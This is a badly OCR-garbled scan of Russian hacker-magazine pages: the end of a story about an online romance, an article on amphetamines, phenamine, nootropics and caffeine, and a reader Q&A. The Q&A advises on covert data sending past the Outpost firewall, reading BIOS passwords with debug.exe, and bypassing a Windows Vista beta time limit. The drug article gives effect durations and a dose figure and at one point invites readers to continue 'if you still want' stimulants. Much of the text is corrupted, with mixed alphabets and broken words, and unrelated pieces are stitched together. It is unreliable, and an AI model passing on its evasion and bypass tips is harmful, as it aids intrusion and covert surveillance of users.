щайся, когда разберешься, кто тебе нужен». 
Нужно было срочно что-то предпринять, ина- 
че я мог потерять ее навсегда. 

«Ну, что посоветуете, мужики?» — спросил я 
у друзей, после того как изложил проблему. 
Кто-то советовал вычислить домашний адрес 
и заказать ей на дом букет настоящих роз, кто- 
то предложил взять у админа «Чата одиноких 
сердец» распечатку лога и подделать ее так, 
будто я просто чесал там языком ни о чем, ро- 
мантик Леха предложил написать любовное 
стихотворение на 1000 строк. Все это мне ка- 
залось примитивным, и, в конце концов, нуж- 
ная идея пришла ко мне сама. 

Для осуществления плана потребовалась 
помощь знакомого хакера и услуги немецкой 
конторы, владеющей несколькими установ- 
ленными в Берлине лайв-камерами. Финаль- 
ным этапом стала красиво оформленная 
электронная открытка, внутри которой нахо- 
дилась только ѵѵѵѵѵѵ-ссылка. Не знаю, что по- 
чувствовала Карина, когда ввела ее в браузер 
и увидела через лайв-камеру, как в центре 



Берлина на огромном здании комбинацией 
включенных и выключенных квартир красова- 
лась яркая надпись: «Карина, я тебя люблю!», 
но двери нашего дома для меня открылись в 
тот же день. 

Прошло полтора года с момента нашей свадь- 
бы. Каринатеперь помогала мне в работе, ког- 
да я говорил, что голоден, заказывала в интер- 
нете пиццу мне на дом, а по вечерам мы играли 
сТочи. Некогда бурные ночи утратили свою яр- 
кость, и «супружеский долг» стал выполняться 
не чаще, чем раз в неделю. Я все больше заду- 
мывался о своей прошлой жизни, о посидел- 
ках с друзьями, которых я уже не видел много 
месяцев, о свободном общении на форумах, 
которое осталось далеко позади. Полтора 
года. . . небольшой срок в реальном мире, но в 
сети, где общение ограничено символами, все 
по-другому. Может, я слишком привык к ней? 
Или это была весенняя депрессия? Я не знал, 
но чувствовал: что-то изменилось. 

Звонок в дверь заставил вздрогнуть. Гости не- 
часто жаловали меня своим визитом. Изредка 
по разным домовым делам звонила соседка 
или приходили евангелисты. Но настоящих 
гостей у меня не было уже много лет. Я открыл 
дверь и увидел на пороге молодую женщину. 
Ее нельзя было назвать красивой — черные 
короткие волосы, слегка полноватая фигура, 
едва заметные веснушки на лице и глаза. . . до 
боли знакомые, раскосые. 

— Ну, здравствуй! — просто сказала она. 

И меня как током поразило. Я не был к этому 
готов и тупо стоял на пороге, не зная, что ска- 
зать. «Я войду?» — спросила она, и я жестом 
пригласил внутрь. 



С того момента, как еще до нашей свадьбы я 
предложил встретиться, я много раз искал 
повод снова завести этот разговор. Я не пере- 
ставал думать о том, что сетевые игры остают- 
ся играми, и, возможно, в реале мы могли бы 
обрести нечто большее. Но я не знал, как все 
обернется, боялся развязки, поэтому все вре- 
мяоткладывал.Ивоттеперьонастоялапередо 
мной. Карина никогда не описывала себя, не 
называла себя красавицей. Все это я додумал 
сам. Нет, я не был сильно разочарован, просто 
представлял все по-другому. 

— Извини, что так неожиданно. Но в последнее 
время я ощущаю, какнаши отношения начина- 
ют идти под уклон. Когда-то ты сделал нечто 
потрясающее, чтобы их вернуть. Теперь при- 
шла моя очередь. И я подумала, что нам стоит 
уже, наконец, встретиться? Может быть, ты 
тогда был прав? 

Сказав это, оназамолчала, и я понял: у этой ис- 
тории есть только один конец. 

Мы вместе уже год. Вместе по-настоящему: 
виртуальные игры закончились, когда про- 
звенел тот роковой звонок. Карина оказалась 
идеальной супругой. Заботливой, домашней. 
Сейчас она ждет ребенка. Могу ли я сказать, 
что счастлив? Я по-своему люблю эту женщи- 
ну, иуже успел кней привязаться, нотаКарина, 
о которой я думал ночи напролет, ради которой 
построил виртуальный дом и совершил су- 
масшедший берлинский хак, осталась в про- 
шлом. Иногда я захожу на маленький райский 
остров, где когда-то сделал ей предложение и 
пытаюсь понять, не совершил ли я ошибку. И 
что лучше — жить, витая вяркихоблаках, или в 
быту, где нет места фантазии? ЗС 
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ТЫ ЗНАЕШЬ СВОЙ КОМПЬЮТЕР КАК СВОИ ПЯТЬ ПАЛЬЦЕВ. МОЖЕШЬ ЗАСТАВИТЬ ЕГО РАБОТАТЬ БЫСТРЕЕ, МОЩ- 
НЕЕ, ЛУЧШЕ, ТЫ ПОНИМАЕШЬ, КАК УСТРОЕН ЕГО МОЗГ В ОБЩЕМ, ПОЛНОСТЬЮ ИМ УПРАВЛЯЕШЬ. А ЗАДУМЫ- 
ВАЛСЯ ЛИ ТЫ КОГДА-НИБУДЬ, ЧТО ПОДОБНЫМ ОБРАЗОМ ТЫ МОЖЕШЬ УСОВЕРШЕНСТВОВАТЬ РАБОТУ СВОЕ- 
ГО СОБСТВЕННОГО КОМПЬЮТЕРА-ГОЛОВЫ. БЫСТРЕЕ ПРИНИМАТЬ РЕШЕНИЯ, УСПЕВАТЬ В ЖИЗНИ СДЕЛАТЬ 
БОЛЬШЕ, СООТВЕТСТВЕННО, ПРОЖИТЬ ЕЕ НАМНОГО ИНТЕРЕСНЕЕ. НАВЕРНЯКА ТЫ ВСТРЕЧАЛ ЛЮДЕЙ, КОТО- 
РЫЕ СВЕТЯТСЯ ЭНЕРГИЕЙ, УСПЕВАЮТ СДЕЛАТЬ ЗА ДЕНЬ КУЧУ ДЕЛ, ЗАКОНЧИТЬ СВОЮ РАБОТУ БЫСТРЕЕ, ЧЕМ 
ДРУГИЕ, И ПОСЛЕ ЭТОГО СОВСЕМ НЕ ЧУВСТВУЮТ СЕБЯ УСТАЛЫМИ. ПОТОМ ИДУТ ТУСОВАТЬСЯ ВСЮ НОЧЬ, 

А НАУТРО СНОВА СВЕТЯТСЯ ТАКОЙ ЖЕ ЭНЕРГИЕЙ НА РАБОТЕ И РАССКАЗЫВАЮТ, ЧТО НОВОГО СЛУЧИЛОСЬ 
В ИХ ЖИЗНИ ЗА ПОСЛЕДНИЕ ТРИ ДНЯ ТАК, КАК БУДТО РАССКАЗЫВАЮТ О НЕДЕЛЬНОМ ОТПУСКЕ. 




мѳриканский психолог Абрахам Маслоу ис- 
следовал биографии десяти наиболее успеш- 
ных и самореализовавшихся людей планеты 
и вывел присущие им всем черты характера и 
особенности личности. Среди них оказались 
оптимизм, уверенность в своих силах и креа- 
тивность. Есть гипотеза, что эти черты и стали 
залогом их социальной успешности. Однако 
наша реальность устроенатак, что постоянно 
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быть на высоте практически невозможно, мы 
сами, а может, судьба не дает возможности 
все время чувствовать себя самыми умными, 
красивыми и лучшими, а ведь это и есть залог 
оптимизма и уверенности в себе — состоя- 
ние, когда нам хорошо. 

Внутри нас постоянно происходят разные 
биологические процессы, которые застав- 
ляют нас думать так, а не по-другому, чувс- 
твовать себя соответствующим образом. 
Хорошо бы разобраться, как работает наш 
мозг. Может быть, им можно управлять? 

О Биологический 
механизм радости 

Всем нашим поведением и всеми нашими 
мыслительными операциями управляет 
наша нервная система, а головной мозг 
— это часть центральной нервной системы 
(ЦНС), которая лежит в области черепа, ос- 
тальная часть ЦНС находится в позвоноч- 
ном столбе. Работу головного мозга обес- 
печивают нервные клетки, нейроны. Работа 



около 50 миллиардов нейронов нашего моз- 
га состоит в том, что они получают сигналы 
от каких-то других нервных клеток и переда- 
ют третьим. Передающие и принимающие 
клетки объединены в нервные сети. Отде- 
льный нейрон с разветвленной структурой 
может посылать сигналы тысячам других 
нейронов. Действительные места соедине- 
ния (специфические точки на поверхности 
нервных клеток), где происходит их контакт, 
называются синапсами, асам процесс пере- 
дачи информации в этих местах — синопти- 
ческой передачей. Но как распознает мозг 
ту информацию, которая попадает к нам? 
Здесь свою роль выполняют нейромедиа- 
торы, которые вырабатываются в нашем 
организме в разном количестве. Например, 
когда ты побеждаешь в игре, информация о 
победе попадает в твой мозг, а чтобы ты и в 
следующий раз стремился выиграть, мозг 
«закрепляет» твою победу положительны- 
ми эмоциями, начиная вырабатывать нейро- 
медиатр «радости» и передавая эту радость 
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Амфетамины нашли сначала военное применение, а затем вошли 
в мировую психотерапевтическую практику и приобрели массовую 
популярность. Во время Второй мировой войны амфетамин давали 
американским и советским летчикам, морякам, танкистам, развед- 
чикам как средство для снятия усталости, борьбы со сном во время 
несения службы, повышения бдительности. 




как информацию всем остальным клеткам. Как, собс- 
твенно, происходит передача информации? 

При взаимодействии нейронов посылающая сигнал- 
клетка (нейрон) с помощью синоптической передачи 
выделяет нейромедиатр. Это молекулярный посредник 
для передачи информации от передающей клетки к 
воспринимающей. Нейромедиатр замыкает цепь, осу- 
ществляя химическую передачу информации через си- 
ноптическую щель — структурный разрыв между пере- 
дающей и воспринимающей клетками в месте синапса. 
Есть такой нейромедиатр — эндорфин, который вы- 
деляется, когдажизнь приносит нам радость. То есть, 
когда в синоптическую щель выделяется эндорфин, 
мы чувствуем прилив радости и всемирного счастья. 

□ Управлять своим счастьем самому 

Это вполне реально, если все время заставлять мозг вы- 
рабатывать эндорфин, или просто его постоянно есть 
как пищевую добавку. Часть человечества, все время 
стремящаяся к удовольствию, научилась это делать. 
Многие наркотики дают человеку ощущения радости 
жизни. Наверное, самый яркий пример — это героин. Я 
думаю, не стоит описывать все негативное влияние, ко- 
торое может оказать нажизнь этот наркотик. Наверняка 
ты вспоминаешь неприятные картинки, когда слышишь 
словосочетание «героиновый наркоман». Спасибо за 
это обществу, в котором мы живем и которое охраняет 
нас от всяких опасностей, как может. Рассмотрим про- 
цессы, происходящие в мозгу при искусственном до- 
бавление нейромедиатора радости. 

При приеме наркотика, который изменяет естественную 
работу мозга, «запасы эндорфина» истощаются, и нужно 
все больше и больше наркотика, чтобы произошла ка- 
кая-то реакция. В какой-то момент происходит перелом, 



когда сам эндорфин не может вырабатываться даже с 
наркотиком. Мозг уже не работает сам по себе, он исто- 
щен, естественные механизмы нарушены, ему постоянно 
требуется наркотик просто для того, чтобы как-то рабо- 
тать. Но наркотик не перестает действовать, он продолжа- 
ет разрушать организм, и в какой-то момент убивает. 

□ Другие способы «развлечь» свой мозг 

Вернемся к нашему супергерою и честно спросим его, 
когда он последний раз употреблял наркотики и какие. 
Скорее всего, ответ будет: «Да, употреблял амфетамин». 
Амфетамин относится кстимуляторам. Они повышают 
умственную и физическую работоспособность, увели- 
чивают выносливость, повышают скорость реакции, 
устраняют чувство усталости и сонливости, увеличи- 
вают объем внимания, способность к запоминанию и 
скорость обработки информации. 

В психологическом отношении стимуляторы вызывают 
ощущение бодрости, улучшение настроения, вплоть до 
выраженной эйфории, повышают общий уровень моти- 
вации. К отрицательным эффектам стимуляторов отно- 
сятся: наступающее после прекращения их воздействия 
общее утомление организма, относительно быстро воз- 
никающая сильная психологическая зависимость. 

После приема амфетаминов через полчаса-час насту- 
пает активное состояние. Подъем настроения сочета- 
ется с выраженным повышением психической и физи- 
ческой активности, приливом энергии, уверенностью в 
себе, своих силах и возможностях. 

Повышение умственной и физической работоспособ- 
ности подтверждается объективными данными. Исче- 
зает потребность в отдыхе и сне. При больших дозах 
активное бодрствование продолжается 2-3 суток, при 
малых дозах — 4-8 часов. У десяти процентов людей 
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Увлечение и широкое распространение амфетаминов началось после 
войны, в Японии, затем в 50-х годах они распространились в США и 
далее — по всей Европе. В СССР стимуляторы стали производиться с 
40-х годов, но в медицинской практике применялись ограниченно и 
были малодоступны. 

амфетамин вызывает реакцию в виде сон- 
ливости, вялости, снижения работоспо- 
собности. Амфетамин относится к классу 
психостимуляторов и действует на наш 
мозг через гамма-аминномаслянную кис- 
лоту (ГАМК). Они резко подавляют аппетит, 
вызывают сужение кровеносных сосудов 



А., 22 ГОДА. Срок употребления ам- 
фетамина — 10 месяцев: 

Да какая успешность? Ты о чем, да вооб- 
ще не пиши об этом. Конечно, сначала 
— классно, чувствуешь, что можешь горы 
свернуть, неспишь, много чего успеваешь. 
У меня работасвязанасобщением: заклю- 



Если тебе все еще хочется ускорить свою 
жизнь искусственным путем, то читай 
дальше. 

Огромный мир существует за пределами 
нашей реальности. Есть еще как минимум 
один наркотик — фенамин, который мгно- 
венно тебя туда перенесет. Но не забывай, 




и повышение давления. Наблюдаются су- 
хость во рту, расширение зрачков, учащен- 
ный пульс. Углубляется дыхание и увеличи- 
вается вентиляция легких. Метамфетамин 
обладает более выраженным действием 
на периферические сосуды. Заметное по- 
вышение давления вызывают дозы более 
20 мг. Но от этого сильно страдает сердце. 

□ Личный опыт 

НО ВЕДЬ МАМА С ПАПОЙ ВСЕГДА ГОВОРИ- 
ЛИ, ЧТО НАРКОТИКИ — ЭТО ПЛОХО. А ЧТО 
ГОВОРЯТ САМИ НАРКОМАНЫ? 

Д.,21 ГОД. Срокупотребления амфе- 
тамина — полгода: 

Тебя просто прет. Чувствуешь в себе силу, 
накоторую можно облокотиться. Нотутвсе 
зависит оттого, какутебя голова работает. 
Если у тебя изначально был потенциал, то 
ты его реализуешь вдвойне, а если мозгов 
нет, то никакой амфетамин не поможет. Я 
уже неделю не ем (смеется). Здорово, что, 
наконец, отпустило. Вообще, это полный 
бред, мозг разрушает, в какой-то момент 
понимаешь, что все, что ты делаешь, совер- 
шенно неадекватно. 



чаю сделки на крупные поставки товара. 
Когда я начал употреблять амфетамин, я 
начал зарабатывать в 3 раза больше. Когда 
чувствуешь себя супер, тебе верят, стобой 
хотят работать, ну и язык, конечно, лучше 
работает(смеется). Нопотом — все, причем 
довольно скоро. Отходники все дольше и 
дольше, потом тебя совсем не прет: ты ешь 
все больше и больше, а толку — никакого. 
Вот тут-то и приходится начинать работать 
своей головой, а ее нет. И все вокруг бесит, 
раздражает, все вокруг кажется беспонто- 
вым. Чувствуешь себя ужасно, и главное — 
непонятно, как из этого выбраться. А многие 
из этого вообще не вылезают. Я видел, как 
люди едят амфетамин ложками и запивают 
водкой. Жесть. А когда начинает ослабевать 
действие одного наркотика, — а это по лю- 
бому происходит, — хочется чего-то посиль- 
нее. Взять себя в руки совершенно нереаль- 
но. И еще, конечно, это опасно, запрещено 
законом. Не люблю об этом говорить, но мне 
пришлось квартиру продать, чтобы отдать 
долги и чтобы меня не посадили. Так что не 
надо об этом писать, никакой социальной 
успешности от амфетамина нет. 



что обратно возвращаться придется само- 
му, а ковра-самолета или палочки-выруча- 
лочки не существует. 

Итак, фенамин относится к группе амфе- 
таминов по химической структуре, а по 
фармакологическому действию — к психо- 
стимуляторам. Этот препарат повышает пси- 
хическую активность, вызывает повышение 
ясности сознания, яркости восприятия, пси- 
хической работоспособности, препятствует 
сонливости и засыпанию. В повышенных 
дозах вызывают явления гиперстимуляции: 
раздражительность, бессонницу, тревогу. 
Фенамин при повторном применении вызы- 
вает физическую зависимость и относится, 
согласно приказу Минздрава, к наркотикам. 
Так как же воспринимается мир после при- 
нятия фенамина?Он повышаетработоспо- 
собность, возникает желание делать все 
аккуратно, с душой. Движения и действия 
точны и размерены. Мир становится поня- 
тен и правилен. Возникает чувство эмпатии 
к людям. Человек находится в состоянии 
эйфории, может беседовать 12 часов без 
перерыва и не спать двое суток и более. 
Затем наступает депрессивное состояние. 
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Работоспособность сохраняется, но если что-то не 
получается, то ты начинаешь сильно переживать. Бе- 
сит, если кто-то пытается тебя заставить что-то делать, 
легко срываешься на ближнего человека. Сильное 
торможение, голова тяжелая... и пошло-поехало. 

О Как же все-таки меняется жизнь... 

Все вышеописанное имеет место быть. Но есть еще 
один нюанс. Мир вокруг нас такой, каким мы его вос- 
принимаем нашим сознанием. Каждый из нас по-раз- 
ному реагируют на одни и те же слова, на одни и те же 



события, происходящие со всеми нами. Например, 
кто-то, увидев драку, с удовольствием в нее вмешает- 
ся, и не из чувства благородного, а потому что душа 
просит по морде дать и самому получить, а другой 
вызовет милицию и уйдет подальше. Когда ты съе- 
даешь наркотик, твое сознание меняется. Соответс- 
твенно, ты на короткий период становишься другим 
человеком, по-другому воспринимаешь мир. Каким 
ты его начинаешь воспринимать, зависит от многих 
факторов: какой это был наркотик, какие люди тебя 
окружают, какая ситуация, где ты находишься и какое 
у тебя в данный момент психологическое и физичес- 
кое состояние. Далее пути твои неисповедимы. Когда 
действие наркотика прекращается, вместе с «отход- 
няком» приходит и совсем другое восприятие окру- 
жающего мира. Как будто ты проснулся, но на самом 
деле ты жил, что-то делал, с кем-то общался. Если ты 
начинаешь употреблять часто, то теряется ощущение 
реальности. Что есть сон: либо когда ты под чем-то, 
либо когда ничего не принял? Ты как бы теряешь сам 
себя, свою личность. Или, наоборот, приобретаешь. 
Это уже философский вопрос, но и в том, и в другом 
случае ты действуешь в реальном обществе, социу- 
ме, а вот насколько адекватно ты в нем действуешь 
— сложно даже предположить. Тебе кажется, что ты 
вполне адекватен, и у тебя полно причин для такого по- 



Амфетамины по-прежнему распростра- 
нены в психотерапевтической практике 
и сохранили свое «военное» значение: 
входят в аптечки специальных подраз- 
делений армии США. Производятся де- 
сятками фирм мира. По классификации 
Всемирной организации здравоохране- 
ния амфетамины относятся 
к наркотикам. 
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В очень малых дозах амфетамины применяются в США для лечения 
сексуальных расстройств, ведь несомненным действием амфетамина 
является резкое усиление полового влечения и сексуальной потенции 
При применении повышенных доз амфетамина снимаются все сдержива- 
ющие «социальные тормоза», поведение обоих полов отличает откры- 
тая сексуальность. 




1 ^ 








Лк 


















м 




_ 

Л . , 




.Я 




1 Ж Я -г" __ 









ведения, а все вокруг тебя просто не пони- 
мают. Ты замечаешь, что друзья перестают 
с тобой общаться совсем не потому, что ты 
чрезмерно агрессивен, а так как зачастую 
несешь всякую чушь и совершенно не вни- 
маешь тому, что тебе говорят. 

□ А где же выход? 

Получается, что волшебства не бывает. 
А наркотики — отнюдь не волшебная па- 
лочка, которая делает из тебя суперге- 
роя. Придется думать своей головой, а не 
обманывать химические процессы своего 
мозга. Ведь, согласись, что за такой обман 
все равно придет расплата. А помочь своей 
бедной головушке справляться с теми за- 
дачами, которые все время перед ней ста- 
вишь, можно и без вредных привычек. На 
этой оптимистичной ноте мы переходим к 
обсуждению следующего класса веществ. 

□ Ноотропы 

Ноотропы делают работу нашего мозга 
сбалансированной, налаживают и улучша- 
ют процессы мышления. Повышают умс- 
твенную работоспособность, облегчают 
процесс обучения и улучшают память. Эти 
препараты можно купить в любой аптеке, но 
пить их надо курсом 2-3 недели (только тог- 



да будет достигнут ощутимый результат). 
Действие препарата начинается через три 
дня. Но если ты сразу выпьешь всю пачку, 
то никакого желаемого результата не будет 
— наоборот, принесешь организму вред. 
Через несколько дней приема ноотропа 
(пирацетама) начинаешь чувствовать, что 
умнеешь. Быстрее находятся решения про- 
блем, думаешь быстрее, меньше расстра- 
иваешься из-за неудач, потому что на них 
не зацикливаешься. Словом, начинаешь 
искать выход из сложившейся ситуации. 
Работать становиться проще, меньшеуста- 
ешь, повышается концентрация внимания и 
продуктивность жизни. 

Действующее вещество пирацетам изме- 
няет скорость распространения возбуж- 
дения в головном мозге, улучшает микро- 
циркуляцию крови в сосудах, улучшает 
связи между полушариями и синаптичес- 
кую проводимость, одновременно оказы- 
вая защитное действие при повреждении 
головного мозга. 

А еще есть замечательное средство — гли- 
цин. Этот препарат уменьшает психоэмо- 
циональное напряжение, агрессивность, 
конфликтность, повышает социальную 
адаптацию и настроение. Нормализует 
сон, повышает умственную работоспособ- 



ность, уменьшает токсическое действие 
алкоголя. Глицин, по своей сути, является 
регулятором обмена веществ, нормали- 
зует и активизирует процессы защитного 
торможения в ЦНС. Но, кроме специальных 
средств для повышения продуктивности 
своей жизни, люди сами находят способы 
себя активизировать. Кто-то начинает день 
с неизменной чашки кофе и сигареты. У ко- 
го-то в бардачке машины всегда припасена 
утренняя баночка энергетика. А еще неко- 
торые люди за день выпивают не меньше 
11 чашек чая или не мыслят свою жизнь 
без шоколада. Почти у каждого из нас есть 
свой «наркотик». Попробуем разобраться 
с некоторыми из них. 

О Кофе 

Хронический прием высоких доз кофеина 
может привести к нервозности, раздражи- 
тельности, гневливости, мышечным подер- 
гиваниям, бессоннице и гиперрефлексии 
(НуреггеЯехіа). Кофеин увеличиваетуровень 
циркулирующих жирных кислот, что спо- 
собствует их окислению и утилизации. Он 
использовался бегунами на длинные дис- 
танции, чтобы усилить метаболизм жиров. 
Кофеин не подавляет аппетит, а напротив, 
возбуждает его. Кроме того, он усиливает 
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секрецию желудочного сока, так что употребление ко- 
феина без пищи может привести к гастриту. 

□ Шоколад 

Обратим пристальное внимание на девушек. Почему они 
так любят шоколадные конфеты? Оказывается, шоколад 
содержит не только теобромин — вещество, очень по- 
хожее на кофеин, — но также вещества, оказывающие 
влияние на женскую гормональную секрецию. Принятый 
большими дозами шоколад резко повышает настроение. 

□ Растения 

Но это еще далеко не все известные человечеству 
способы воздействия на нервную систему. Наберегах 
холодного и северного Белого моря растет золотой 
корень. Он, а еще жень-шень, лимонник дальневос- 
точный и элеутерококк называются адаптогенами. 
Различные препараты природного (растительного 
или животного) происхождения могут оказывать то- 
низирующее и стимулирующее действие на функции 
нервной системы и организм в целом. 

Обычно эти препараты малотоксичные, но, как и другие 
стимуляторы, должны применяться с соответствующей 
осторожностью. В первые дни приема никакого эффек- 
та не наблюдается. Но где-то к концу первой недели 
замечается повышение работоспособности, улучше- 
ние сна: легче встаешь и засыпаешь, сон спокойный и 
глубокий. Настроение становится более ровным, спо- 
койным, а мысли — необычайно ясными, как будто бы с 



глаз спала серая пелена. Короче, ты становишься более 
собранным. 

□ Эпилог и некролог 

На этом можно закончить краткий обзор веществ, ко- 
торые способствуют работе нашего мозга. Мной были 
старательно описаны основные механизмы, связанные 
с передачей информации, скоростью работы, объемом 
памяти. Это предложение вполне можно отнести и к ра- 
боте компьютера, тем не менее, оно о человеке. А че- 
ловек, как известно, — более сложно организованная 
система, чем компьютер. Каждый, кто полноценно ис- 
пользуетто, что далаему природа, чувствуетсебя счас- 
тливым. Человек — целостная система, в которой все 
взаимосвязано. Просто нужно чувствовать и понимать 
свой организм, любить и заботиться о себе — и резуль- 
таты не заставят себя ждать. Когда мы научимся спать 
столько, сколько требуется нашему организму, всегда 
будет ресурс, как у заряженного аккумулятора. Каж- 
додневные физические упражнения на свежем воздухе 
улучшают обмен веществ в головном мозге, поднимают 
общий физический тонус. Кровь, насыщаясь кислоро- 
дом, бежит быстрее и нас заставляет жить активнее. 
Утренний контрастный душ улучшает работу сосудов 
и повышает иммунитет, уменьшает нашу подвержен- 
ность стрессам. Есть множество способов увеличить 
продуктивностьсвоейжизни, не прибегая кхимическо- 
му воздействию. Нообэтом — вдругой раз, пойдулучше 
выпью свою 7-ую кружку чая за сегодня:). □□ 



> В I веке до нашей эры 
американские индейцы 
начали использовать 
табак в медицинских 
и религиозных целях. 
Табачные листы на- 
кладывались на раны 
как болеутоляющее. 
Ажевательный табак, 
считалось, снимает 
зубную боль. 1 5 октября 
1 492 табак был пред- 
ложен Христофору 
Колумбу американскими 
индейцами в качестве 
подарка. Вскоре после 
этого табак был завезен 
в Европу, и его начали 
выращивать повсе- 
местно. 
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ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТО- 
ИТ МНЕ ПОСЫЛАТЬ ВОПРОСЫ, 

ТАК ИЛИ ИНАЧЕ СВЯЗАННЫЕ С ХАКОМ/ 
КРЭКОМ/ФРИКОМ — ДЛЯ ЭТОГО ЕСТЬ 
НАСК-ЕАО (НАСКЕАО@ВЕАІ_. ХАКЕР. 
ВЫ), НЕ СТОИТ ТАКЖЕ ЗАДАВАТЬ 
ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, 
ОТВЕТ НА КОТОРЫЕ ТЫ ПРИ ОПРЕДЕ- 
ЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ 
И САМ. Я НЕ ТЕЛЕПАТ, ПОЭТОМУ КОНК 
РЕТИЗИРУЙ ВОПРОС, ПРИСЫЛАЙ 
КАК МОЖНО БОЛЬШЕ ИНФОРМАЦИИ. 



О: Здравствуйте, простите меня, чай- 
ника, но я не знаю, как установить 
ѴѴіпііоѵѵз Ѵізіа, выложенную на ОѴР. 
Помогите, пожалуйста. Напишите, 
что надо сделать! 

А: Разархивировав архив, ты получил 
образ ѴѴіпбоѵѵз Ѵізіа. Это точная копия ; иска 
с дистриоі/тивом, но іголькр внутри срвила. 
Все, что от тебя требуется, — записать его 
на ЭѴЭ-болванку, воспользовавшись ' Ыего 
или любой другой аналогичной программой. 
Главное — записывать не сам 130-образ, а из 
150-образа: для этого всегда доступна функ- 
ция «записать из образа». Таким образом, ты 
получишь загрузочный диск с установщиком. 



СТЕПАН_«5ТЕР» ИЛЬИН 

I РАСМВЕАІ.. ХАКЕР. НЦ / 



Инсталляцию можно начать либо из-прд ус- 
тановленной системы, либо загрузившись с 
диска (предварительно активировав загруз- 
ку с СЭРОМ в ВІОЗ’е компьютера). Вот, собс- 
твенно, и все. Дальше проблем возникнуть не 
должно, так как бойцы из МісгозоІІ сделали 
все возможное, чтобы вся установка протека- 
ла предельно просто. 

Впрочем, когда возможности записать бол- 
ванку нет, или простр не хочетря портить 
систему, можно попробовать ^станфвить 
Ѵізіа на виртуальной машине. 

180-файл нужно примонтировать как СО- 
РОМ. Виртуальной машине.для нормальной 
работы придется выделять как минимум 512 
Мб оперативки и не менее* 10-15 Гб диско- 
вого пространства (сама Ѵізіа занимает 
больше 7 гигов). Парни с нашего форума 
( ѵѵѵѵѵѵ.хакер.ги і уже подели/ ись впечатлени- 



ями и выяснили, что с задачами виртуализа- 
ции вполне справляются ѴМѵѵаге ѴѴогкзі&ііоп 
и МісгозоК Ѵігіиаі Зегѵег. Правда, работать 
в такой системе все равно вряд ли удастся 
— сплошные тормоза и лаги. Есть еще одна 
проблема: срок работы бета-версии. Изба- 
виться от этого! досадного недоразуміния 
можно нехитрыми манипуляциями с помо- 
щью программы, свободно доступной на 
сайте НФр://ап1іѵѵра.ога.ги /. 

О: Пишу приложение, которое скрыт- 
но от пользователя отсылает не- 
которую статистику на удаленный 
сервер. Все легально, это чистая 
формальность. Программа должна 
уметь обходить файрволы. Начать 
стоит, видимо, с Оиірозі’а, как наибо- 
лее распространенного брандмауэ- 
ра. Что скажешь? 

неправомерная отсылка информа- 
ции — это уже само по себе нелегально. Но 
Оифозі — это крепкий орешек. Даже в базо- 
вой конфигурации он имеет мощную защиту 
от внедрения (Іфес*) кода, контроль компо- 
нентов, да и вообще, обойти его в ІІзег Мобе 
довольно сложн®. Если посмотреть на бранд- 
мауэр в разрезе, то выяснится, что защита от 






перехвата осуществляется сразу на 4-х уров- 
нях: ТОІ (засекаютбя обращение к! устройс- 
твам \Юеѵісе\Ір,\Юеѵісе\ВаѵѵІр,\ОеѵісеуГср 
и\Оеѵісе\1)бр), на уровне ІрНІІегОгіѵег Спе- 
циальная и документированная фишка 
ѴѴіпбоѵѵз), на урЬвне N013 (спецификация 
стандартного интерфейса сетевых адапте- 
ров, разработанная компанией Місгозоіі для 
того, чтобы сделать коммуникационные про- 
токолы независимыми от сетевого оборудо- 
вания компью тера) и на уровне библиотеки 
0Ы8АРІ, преобразовывающей доменное имя в 
ІР-адрес. Но, несмотря навсеухищрения раз- 
работчиков, обойти все это можно. О том, как 
справиться с каждой из защит, ты сможешь 
прочитать в этой статье: ѵѵѵѵѵѵ.ѵѵазт.ги/агіісіе. 
рНр? аг!ісІе=ои1роз1к . Материал сопровожда- 
ется исходниками. 

О: Как наиболее просто можно сбро- 
сить пароль на ВІО$, имея минималь- 
ные права в системе? 

-Аі В составе систем ѴѴіпбоѵѵз ЫТ поставляется 
довольно полезная утилита — беЬид. ехе. Эда- 
кий стандартный дебагг-ер, о котором мало кто 
знает и еще меньще пользуется. Но сегодня он 
будет полезен. Спросить все настройки БІ/ІО- 
Са, в том числе пароль на загрузку, можно, 
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ав лишь несколько команд в этом самом 
ггере: 



серьезной уликой, когда хакера все-таки от- 
следят с помощью высокотехноличных пе- 
ленгаторов, так это еще и хороший спрсоб 
выйти на него! По МАС-адресу легко опре- 
деляется производитель карточки, у кото- 
рого есть базы соответствия МАС-адреса 




Ввел? Тогда перегружай 


іся и прові 


вряй. 


Поскольку порты у все: 
ХА_МІ. АѴѴАРР и прочие 


х типов Б1/ 
) стандар- 


^ОСа 

гные, 



этот способ одинаково хорошо поджодит 
для каждого из них. 



О: Парни, виндовский зѵѵар-файл 

— зараза еще та. После незамысло- 
ватого исследования оказалось, что 
туда пишется просто уйма конфи- 
денциальной информации! конечно, 
зѵѵар можно безопасно удалить (с 
помощью той же ВСѴѴіре), но не бу- 
дешь же делать это каждый раз. Су- 
ществует ли более гибкий выход из 
этой неприятной ситуации? 

А: А почему бы не шифровать фай/| под- 
качки на лету? Конечно, большинство 
средств для шифрования данных тако&і воз- 
можности не имеют, однако подходящие 
утилиты все же есть. СгурІоЗѵѵар СЦіегіІІа 
( ѵѵѵѵѵѵ.аеосЩез.сот/рИозрІіог2013/Ііз1.Иі:Ф ). 
например, с этой задачей справится навер- 
няка. После установки СгурІоЗѵѵар загружа- 
ет свой низкоуровневый драйвер, причем 
делает это перед тем, как в А/іпбоѵѵз стартует 
механизм виртуальной памяти и инициализи- 
рует зѵѵар-файл. После этэго генерируется 
случайный ключ шифрования, уникальный 
для текущей сессии: в течение всей работы 
он будет храниться в оперативной памяти и ни 
разунебуде т записанна диск. П ослезап рузки 
драйвер скрупулезно перехватывает все за- 
просы на операции чтения/записи зѵѵарі-фай- 
лаивыполняетих, шифруя вседанныес помо- 
щью уникального ключа. Мало того, во зремя 
выхода из системы СгурІоЗѵѵар удаляет файл 
со зѵѵар’ом, забивая его нулями. Впрочем, эту 
функцию, требующую время, можно легко от- 
ключить, запустив прилагаемый к программе 
файл сІізаЫезѵѵарѵѵіре. гед. 

г — — і I— 

О: Каким образом можно отловить и 

ДОК.: рдр 

А: Трейсинг (обнаружение) хакера компетен- 
тными органами осуществл-яется-достаточно 
просто: в большинстве случаев поюле проник- 
новения МАС-адрес атакующего сохраняет- 
ся в таблице АВР (при прохождении через ро- 
утер) или же САМ-таблице (при прохождении 

іи 

через свитч). Мало того, что МАС-адрес будет 



^ѵаЗсгірр определяет, какая информация 
необходима дляіобновления страницы. Бра- 
узер отправляет соответствующий за|рфс 
